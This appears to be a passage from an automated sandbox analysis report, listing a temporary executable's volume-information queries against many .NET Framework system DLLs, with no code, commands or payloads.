                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq.Expressions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.Expressions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq.Parallel\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.Parallel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Management.Instrumentation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Instrumentation\v4.0_4.0.0.0__b77a5c561934e089\System.Management.Instrumentation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Http.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Http.Rtc\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Http.Rtc.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Http.WebRequest.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Http.WebRequest\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Http.WebRequest.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.NameResolution.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.NameResolution\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.NameResolution.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.NetworkInformation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.NetworkInformation\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.NetworkInformation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Ping.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Ping\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Ping.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Requests.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Requests\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Requests.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.Sockets.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.Sockets\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Sockets.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.WebHeaderCollection.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.WebHeaderCollection\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.WebHeaderCollection.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.WebSockets.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.WebSockets\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.WebSockets.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Numerics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Numerics.Vectors.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ObjectModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Reflection.context.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Context\v4.0_4.0.0.0__b77a5c561934e089\System.Reflection.context.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Reflection.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Reflection.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Reflection.Emit.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Emit\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Reflection.Emit.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Reflection.Emit.ILGeneration.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Emit.ILGeneration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Reflection.Emit.ILGeneration.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Reflection.Emit.Lightweight.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Extensions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Reflection.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Reflection.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Reflection.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Resources.Reader.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Resources.Reader\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Resources.Reader.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Resources.ResourceManager.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Resources.ResourceManager\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Resources.ResourceManager.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Resources.Writer.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Resources.Writer\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Resources.Writer.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Caching.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Caching\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Caching.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.CompilerServices.VisualC.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.CompilerServices.VisualC\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.CompilerServices.VisualC.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.DurableInstancing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.DurableInstancing\v4.0_4.0.0.0__31bf3856ad364e35\System.Runtime.DurableInstancing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Extensions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Handles.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Handles\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Handles.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.InteropServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.InteropServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.InteropServices.WindowsRuntime.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.WindowsRuntime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.InteropServices.WindowsRuntime.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Numerics.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Remoting.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Serialization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Serialization.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Serialization.Formatters.Soap.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Serialization.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Serialization.Xml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Xml\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Xml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.WindowsRuntime.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.WindowsRuntime.UI.Xaml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.WindowsRuntime.UI.Xaml\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.WindowsRuntime.UI.Xaml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.Claims.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Claims\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Claims.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.Cryptography.Algorithms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Cryptography.Algorithms\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Cryptography.Algorithms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.Cryptography.Csp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Cryptography.Csp\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Cryptography.Csp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.Cryptography.Encoding.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Cryptography.Encoding\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Cryptography.Encoding.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.Cryptography.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Cryptography.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Cryptography.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Cryptography.X509Certificates\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Cryptography.X509Certificates.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Security.Principal.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.Principal\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.Principal.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security.SecureString\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.SecureString.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.Activation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Activation\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Activation.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Channels\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Channels.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.Discovery.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Discovery\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Discovery.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Duplex\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.Duplex.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.Http.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Http\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.Http.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.NetTcp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.NetTcp\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.NetTcp.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Primitives\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.Primitives.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.Routing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Routing\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Routing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.ServiceMoniker40.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.ServiceMoniker40\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.ServiceMoniker40.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.WasHosting.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.WasHosting\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.WasHosting.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceModel.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Text.Encoding.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Text.Encoding\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Text.Encoding.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Text.Encoding.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Text.Encoding.Extensions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Text.Encoding.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Text.RegularExpressions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Text.RegularExpressions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Text.RegularExpressions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Threading.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Threading.Overlapped.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Overlapped\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Overlapped.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Threading.Tasks.Parallel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks.Parallel\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.Parallel.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Threading.Thread.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Thread\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Thread.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Threading.ThreadPool.dll VolumeInformation
